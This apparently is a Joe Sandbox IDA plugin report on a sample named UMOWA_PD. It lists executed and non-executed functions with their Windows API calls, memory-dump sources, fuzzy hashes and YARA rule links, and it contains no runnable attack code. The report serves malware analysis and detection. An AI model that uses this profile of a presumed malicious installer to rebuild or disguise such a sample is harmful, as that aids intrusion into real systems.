                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText
                                                                                    • String ID:
                                                                                    • API String ID: 3367045223-0
                                                                                    • Opcode ID: 9f5f9317995870dd68fcf34551989b3f9c33a874f6e62bdf9e4bbf2fb329bfe5
                                                                                    • Instruction ID: ae2ead1ac10e0797e36fe1c05e7dcabccdaa2022beaf041c85de5a3ae6598913
                                                                                    • Opcode Fuzzy Hash: 9f5f9317995870dd68fcf34551989b3f9c33a874f6e62bdf9e4bbf2fb329bfe5
                                                                                    • Instruction Fuzzy Hash: C9C08C71008200BFD241BB08CC02F1FB3AAEF90325F00C42EB15CA10D2C63595308A26
                                                                                    Function 004044EC Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                                    • Instruction ID: 5c877ab33ec7e7ab303c696e8a99d36134f19a60efc45403e0926baa73fdbb46
                                                                                    • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                                    • Instruction Fuzzy Hash: 9AC09BF57413017BDA209F509D45F1777585790710F15453D7350F50E0CBB4E450D61D
                                                                                    Function 004044D5 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                                    • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                                                    • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                                    • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                                                    Function 004034B4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                    • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                    • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                    • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                    Function 004044C2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00404299), ref: 004044CC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                    • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                                                    • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                    • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                                                    Function 6FE22B98 Relevance: 1.4, APIs: 1, Instructions: 143memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNELBASE(00000000), ref: 6FE22C57
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6fe20000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 350e415f25b7e05aca12c49bc6186eebd82887fc3fdcfbc3d1cb3bc75c062be5
                                                                                    • Instruction ID: 7b381bd05e5b6773bb6538453926fc435f0e2c7277ecb33b9f82ee5537188ee6
                                                                                    • Opcode Fuzzy Hash: 350e415f25b7e05aca12c49bc6186eebd82887fc3fdcfbc3d1cb3bc75c062be5
                                                                                    • Instruction Fuzzy Hash: C14190719107049FEB209F68DE41F5D3FF5FB66328F308829E4048A244FF78A9919BA1
                                                                                    Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 5065bf49ec89ca03d4d81e0e626b625f4b0a8bbe3ca9100aab93803b3529547f
                                                                                    • Instruction ID: a775f6773ee6fca20605c15f6de2f930d7ecc582f877687dc3caa15317c5c1fc
                                                                                    • Opcode Fuzzy Hash: 5065bf49ec89ca03d4d81e0e626b625f4b0a8bbe3ca9100aab93803b3529547f
                                                                                    • Instruction Fuzzy Hash: 8ED05E73A142008BD710EBB8BE854AF73B8EA403193204C3BD102E1191E6788902461C
                                                                                    Function 6FE212BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,6FE212DB,?,6FE2137F,00000019,6FE211CA,-000000A0), ref: 6FE212C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6fe20000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocGlobal
                                                                                    • String ID:
                                                                                    • API String ID: 3761449716-0
                                                                                    • Opcode ID: 843cdc8866cb1a8cd020d634f850121284c4f6e0743768c4885d16b423fa6f78
                                                                                    • Instruction ID: 59c367e63d97cf6630134f9d0dac3d746881933d1c55851bac3e9425443b9006
                                                                                    • Opcode Fuzzy Hash: 843cdc8866cb1a8cd020d634f850121284c4f6e0743768c4885d16b423fa6f78
                                                                                    • Instruction Fuzzy Hash: 09B012706005009FEE008B18DD0AF343B56F703310F040001F600C1041E96048208925

                                                                                    Non-executed Functions

                                                                                    Function 00404991 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 004049E0
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404A0A
                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404ABB
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404AC6
                                                                                    • lstrcmpiW.KERNEL32(Call,00422F08,00000000,?,?), ref: 00404AF8
                                                                                    • lstrcatW.KERNEL32(?,Call), ref: 00404B04
                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B16
                                                                                      • Part of subcall function 00405B65: GetDlgItemTextW.USER32(?,?,00000400,00404B4D), ref: 00405B78
                                                                                      • Part of subcall function 004067CF: CharNextW.USER32(?,*?|<>/":,00000000,00434000,76E63420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                      • Part of subcall function 004067CF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                      • Part of subcall function 004067CF: CharNextW.USER32(?,00434000,76E63420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                      • Part of subcall function 004067CF: CharPrevW.USER32(?,?,76E63420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                    • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,?,00420ED8,?,?,000003FB,?), ref: 00404BD9
                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BF4
                                                                                      • Part of subcall function 00404D4D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                      • Part of subcall function 00404D4D: wsprintfW.USER32 ref: 00404DF7
                                                                                      • Part of subcall function 00404D4D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: A$Call
                                                                                    • API String ID: 2624150263-209694386
                                                                                    • Opcode ID: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                                                    • Instruction ID: 030197d704291a410dcd06cfc4277a043b64cd4f667f0077e3e502e998d69d3f
                                                                                    • Opcode Fuzzy Hash: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                                                    • Instruction Fuzzy Hash: CBA1A0B1900208ABDB11AFA5DD45AAF77B8EF84314F11803BF611B62D1D77C9A418B6D
                                                                                    Function 004021AF Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInstance
                                                                                    • String ID:
                                                                                    • API String ID: 542301482-0
                                                                                    • Opcode ID: 18b8905a52bb68317a5b1bf06e2d786d8dd953d3db2333650e4a3939e0f89523
                                                                                    • Instruction ID: 8307c529eb9feefa1617cd4f78f27985085e4fae61a1ffd37fb0b3adda41be3b
                                                                                    • Opcode Fuzzy Hash: 18b8905a52bb68317a5b1bf06e2d786d8dd953d3db2333650e4a3939e0f89523
                                                                                    • Instruction Fuzzy Hash: 00410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54
                                                                                    Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst
                                                                                    • String ID:
                                                                                    • API String ID: 1974802433-0
                                                                                    • Opcode ID: 6ffcda492f923abc76daec6159b81a3f5593eca79e3a3c3abc80d0637868bc28
                                                                                    • Instruction ID: a06f58704ac02dcae893024ea8a23b5ac4ca5f5a8623c8e138aed3c50dac2e18
                                                                                    • Opcode Fuzzy Hash: 6ffcda492f923abc76daec6159b81a3f5593eca79e3a3c3abc80d0637868bc28
                                                                                    • Instruction Fuzzy Hash: 44F05E71A04104AAD711EBE4E9499AEB378EF14314F60057BE101F21D0DBB84D019B2A
                                                                                    Function 00404F0D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404F25
                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404F30
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F7A
                                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F91
                                                                                    • SetWindowLongW.USER32(?,000000FC,0040551A), ref: 00404FAA
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FBE
                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FD0
                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404FE6
                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FF2
                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405004
                                                                                    • DeleteObject.GDI32(00000000), ref: 00405007
                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405032
                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040503E
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D9
                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405109
                                                                                      • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040511D
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040514B
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405159
                                                                                    • ShowWindow.USER32(?,00000005), ref: 00405169
                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405264
                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C9
                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DE
                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405302
                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405322
                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00405337
                                                                                    • GlobalFree.KERNEL32(?), ref: 00405347
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053C0
                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405469
                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405478
                                                                                    • InvalidateRect.USER32(?,00000000,?), ref: 004054A3
                                                                                    • ShowWindow.USER32(?,00000000), ref: 004054F1
                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 004054FC
                                                                                    • ShowWindow.USER32(00000000), ref: 00405503
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                    • String ID: $M$N
                                                                                    • API String ID: 2564846305-813528018
                                                                                    • Opcode ID: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                                                    • Instruction ID: 467e9106b9ab4b1e9b2d04e68362d71007c986f05034cc4a0cb7dcf353c6e141
                                                                                    • Opcode Fuzzy Hash: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                                                    • Instruction Fuzzy Hash: 16029B70A00609EFDB20DF95DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42CF58
                                                                                    Function 0040465F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CheckDlgButton.USER32(?,-0000040A,?), ref: 004046FD
                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404711
                                                                                    • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040472E
                                                                                    • GetSysColor.USER32(?), ref: 0040473F
                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040474D
                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040475B
                                                                                    • lstrlenW.KERNEL32(?), ref: 00404760
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040476D
                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404782
                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004047DB
                                                                                    • SendMessageW.USER32(00000000), ref: 004047E2
                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040480D
                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404850
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0040485E
                                                                                    • SetCursor.USER32(00000000), ref: 00404861
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040487A
                                                                                    • SetCursor.USER32(00000000), ref: 0040487D
                                                                                    • SendMessageW.USER32(00000111,?,00000000), ref: 004048AC
                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
